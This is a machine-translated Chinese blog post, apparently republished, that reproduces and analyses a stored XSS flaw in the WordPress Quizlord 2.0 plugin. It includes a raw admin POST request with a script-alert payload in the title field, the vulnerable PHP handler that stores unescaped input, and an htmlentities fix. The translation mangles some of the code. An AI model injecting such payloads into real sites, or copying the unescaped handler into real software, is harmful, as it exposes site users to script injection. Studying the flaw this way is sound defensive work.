Shulou(Shulou.com)06/01 Report--

Years later, taking advantage of this gap when there is not much need to do security testing systems, learn from python to look around, reproduce and analyze some simple vulnerabilities.

-- from Lyricbao

0x00 Reproduction Environment phpstudywordpress version 4.4 Quizlord version 2.0

It seems that most of the vulnerabilities in WordPress are due to security problems with its plug-ins.

0x01 step

Use phpstudy to build the environment, build wordpress, and then log in to the background to download the Quizlord plug-in, version 2.0

When everything is ready, we will start to see how to trigger the XSS.

3) At the title type: poc "> alert (1), then fill the remaining fields and click Save.

-- from exploit-db

XSS injection point: title

Request package

POST / wp4.4/wordpress/wp-admin/admin.php HTTP/1.1Host: localhostContent-Length: 184Cache-Control: max-age=0Origin: http://localhostUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/* Q=0.8Referer: http://localhost/wp4.4/wordpress/wp-admin/admin.php?page=quizlordAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: wordpress_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7C43a2436e074320bb113475ff8e44222065a4454e602d990d36639085856f0dd3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7Cf23acf621ce28dbfc8f0baf9abe31370d3fc5674ca575a4ba1029832ca552c62; wp-settings-time-1=1550197219; pgv_pvi=4214545408; Phpstorm-c3dafaf3=cd60577d-e9ad-4825-b2e4-7a109a7e2faf PHPSESSID=8v8jf1s93dprjgq4bpo29ldsq7Connection: closeaction=ql_insert&title=%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=1&time=0&numbtype=numerical&numbmark=1&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

The effect is, of course, a trigger. There is no filtering in the code. This is a storage XSS.

Analysis of the principle of 0x02 vulnerability

If you know it, you need to know why. Let's take a look at which link the problem occurs.

Go to the Quizlord plug-in directory, find quizlord.php, and open

The problem is that the function title is written directly into the database without being escaped by the filter box.

Function ql_insert_quiz_data () {global $wpdb; if (! empty ($_ POST ['title'])) {$ql_title = $_ POST [' title']; $ql_description = $_ POST ['description']; $ql_time = $_ POST [' time']; $ql_rightcolor = "#". $_ POST ['rightcolor']; $ql_wrongcolor = "#". $_ POST [' wrongcolor'] $ql_numbtype = $_ POST ['numbtype']; $ql_numbmark = $_ POST [' numbmark']; $ql_showtype = $_ POST ['showtype']; $ql_random = isset ($_ POST [' random'])? 1: 0; $ql_skip = isset ($_ POST ['skip'])? 1: 0; $ql_resume = isset ($_ POST [' resume'])? 1: 0 $ql_backbtn = isset ($_ POST ['backbtn'])? 1: 0; $ql_autoload = isset ($_ POST [' autoload'])? 1: 0; $ql_checkcnt = isset ($_ POST ['checkcnt'])? 1: 0 $wpdb- > insert ($wpdb- > prefix.'ql_quizzes', array ('name' = > $ql_title,' description' = > $ql_description, 'time' = > $ql_time,' right_color' = > $ql_rightcolor, 'wrong_color' = > $ql_wrongcolor,' numbering_type' = > $ql_numbtype, 'numbering_mark' = > $ql_numbmark 'show_type' = > $ql_showtype,' random' = > $ql_random, 'skip' = > $ql_skip,' resume' = > $ql_resume, 'autoload' = > $ql_autoload,' back_button' = > $ql_backbtn, 'check_continue' = > $ql_checkcnt)) } wp_redirect ($_ SERVER ['HTTP_REFERER']); exit ();} add_action (' admin_action_ql_insert', 'ql_insert_quiz_data'); 0x03 vulnerability PoC

To be written

0x04 vulnerability repair uses the htmlentities () function to escape html entities.

At the beginning, I thought I had inserted payload into the database at the beginning. Why don't you escape at the location of the output?

So navigate to the output code and modify it to

The output becomes normal and there is no way to trigger the XSS vulnerability.

If you escape at the input point, locate to the location of the input assignment and add $ql_title = htmlentities ($_ POST ['title']).

In this case, it is best to escape both input and output points, so that it is much more guaranteed.

0x05 Reference

Https://www.exploit-db.com/exploits/45307 details of the vulnerability and how to reproduce it.

This guy from the Chinese version of https://www.freebuf.com/vuls/189814.html also wrote it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.